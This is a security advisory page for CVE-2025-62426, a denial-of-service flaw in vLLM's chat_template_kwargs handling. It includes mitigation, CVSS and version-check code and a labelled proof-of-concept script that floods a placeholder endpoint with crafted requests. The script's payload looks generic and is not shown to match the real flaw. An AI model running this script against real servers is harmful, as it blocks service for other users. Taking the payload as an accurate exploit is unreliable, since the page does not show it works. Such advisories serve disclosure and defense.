Security Vulnerability Report
CVE-2025-62426 CVSS 6.5 MEDIUM

Published: 2025-11-21 02:15:44
Last Modified: 2025-12-04 17:42:11

Description

vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1.
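For deployments that cannot upgrade immediately, one possible stopgap is to validate chat_template_kwargs in a proxy or middleware before the request reaches vLLM. The sketch below is a generic allowlist check, not the upstream patch. The function name, the allowed key names, and the size limit are all assumptions chosen for illustration and would need to match the chat template actually in use.

```python
import json

# Hypothetical allowlist: only the keyword names your chat template really uses.
ALLOWED_TEMPLATE_KWARGS = frozenset({"enable_thinking", "add_generation_prompt"})
# Hypothetical cap on the serialized size of the kwargs object.
MAX_KWARGS_BYTES = 4096


def sanitize_chat_template_kwargs(kwargs):
    """Return a validated copy of chat_template_kwargs or raise ValueError."""
    if kwargs is None:
        return {}
    if not isinstance(kwargs, dict):
        raise ValueError("chat_template_kwargs must be a JSON object")

    # Reject any key that is not explicitly allowed.
    unknown = sorted(str(key) for key in kwargs if key not in ALLOWED_TEMPLATE_KWARGS)
    if unknown:
        raise ValueError(f"unsupported chat_template_kwargs keys: {unknown}")

    # Reject oversized values before they reach template rendering.
    if len(json.dumps(kwargs).encode("utf-8")) > MAX_KWARGS_BYTES:
        raise ValueError("chat_template_kwargs is too large")

    return dict(kwargs)
```

A proxy would call sanitize_chat_template_kwargs on the parsed request body and return HTTP 400 when it raises. Upgrading to 0.11.1 remains the fix named in the advisory.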

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
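To show how the vector maps to the 6.5 score, here is a small sketch of the CVSS v3.1 base-score calculation. The metric weights and the rounding rule follow the published CVSS v3.1 specification. The function names are illustrative, and the code handles base metrics only (no temporal or environmental metrics).

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value):
    """Round up to one decimal place using the spec's integer-based rule."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def parse_vector(vector):
    """Split 'CVSS:3.1/AV:N/...' into a dict such as {'AV': 'N', ...}."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError(f"unsupported vector prefix: {prefix}")
    return dict(part.split(":", 1) for part in parts)


def base_score(vector):
    """Return (base score, exploitability sub-score, impact sub-score)."""
    m = parse_vector(vector)
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0, round(exploitability, 1), 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10)), round(exploitability, 1), round(impact, 1)


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"))
# → (6.5, 2.8, 3.6)
```

The sub-scores agree with the exploitabilityScore (2.8) and impactScore (3.6) fields in the raw record. The whole score comes from availability impact (A:H), since confidentiality and integrity are both rated N.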

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE
vLLM >= 0.5.5 and < 0.11.1
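The affected range, including the two listed release candidates, can be checked against a version string with a short helper. This is a minimal sketch using only the standard library. The function names are illustrative, and the parser only understands plain release numbers with an optional a/b/rc suffix, so development or local builds (for example a ".dev" suffix) are treated as the release they are based on.

```python
import re

_VERSION_RE = re.compile(r"^v?(\d+(?:\.\d+)*)(?:(a|b|rc)(\d+))?")

FIRST_AFFECTED = "0.5.5"
FIRST_FIXED = "0.11.1"


def _sort_key(version):
    """Build a comparable key; a pre-release of X sorts just before X."""
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognized version string: {version!r}")
    release = tuple(int(part) for part in match.group(1).split("."))
    release += (0,) * (4 - len(release))  # pad so 0.11.1 and 0.11.1.0 compare equal
    is_final = 0 if match.group(2) else 1
    return release, is_final


def is_affected(version):
    """True if the version falls in >= 0.5.5 and < 0.11.1 (rc builds included)."""
    return _sort_key(FIRST_AFFECTED) <= _sort_key(version) < _sort_key(FIRST_FIXED)


for candidate in ("0.5.4", "0.5.5", "0.11.0", "0.11.1rc1", "0.11.1"):
    print(candidate, is_affected(candidate))
```

On a host with vLLM installed, importlib.metadata.version("vllm") from the standard library can supply the version string to pass in.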

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-62426 PoC - vLLM chat_template_kwargs DoS

This PoC demonstrates the denial of service vulnerability in vLLM's
chat_template_kwargs parameter handling.
"""
import concurrent.futures
import time

import requests

TARGET_URL = "http://target-server:8000/v1/chat/completions"


def trigger_dos():
    """
    Send a malicious request with crafted chat_template_kwargs
    to trigger long processing time.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer YOUR_API_KEY",
    }

    # Craft malicious payload with problematic chat_template_kwargs
    payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [
            {"role": "user", "content": "Hello"}
        ],
        # Malicious chat_template_kwargs that triggers DoS
        "chat_template_kwargs": {
            "loop_trigger": True,
            "nested_data": {"level1": {"level2": {"level3": {"level4": {"level5": "x" * 1000}}}}},
        },
    }

    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            timeout=5,
        )
        print(f"Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - DoS successful")
    except Exception as e:
        print(f"Error: {e}")


def verify_dos():
    """
    Check server availability after the attack.

    Returns True if a normal request still succeeds, False otherwise.
    """
    normal_payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [{"role": "user", "content": "Hi"}],
    }

    try:
        response = requests.post(
            TARGET_URL,
            json=normal_payload,
            timeout=10,
        )
        return response.status_code == 200
    except requests.exceptions.RequestException:
        # Timeouts and connection errors both count as "not available".
        return False


if __name__ == "__main__":
    print("[*] Starting CVE-2025-62426 DoS attack...")

    # Send multiple malicious requests
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        futures = [executor.submit(trigger_dos) for _ in range(3)]
        concurrent.futures.wait(futures)

    print("[*] Verifying server availability...")
    time.sleep(2)

    if not verify_dos():
        print("[+] DoS confirmed - Server is unresponsive")
    else:
        print("[-] Server still responsive")

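References

https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610 - Product
https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814 - Product
https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b - Patch
https://github.com/vllm-project/vllm/pull/27205 - Issue Tracking
https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p - Vendor Advisory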

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62426", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.570", "lastModified": "2025-12-04T17:42:10.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.5.5", "versionEndExcluding": "0.11.1", "matchCriteriaId": "BA1047E1-ED1E-4685-B699-8CE5B2058D87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": 
"https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27205", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}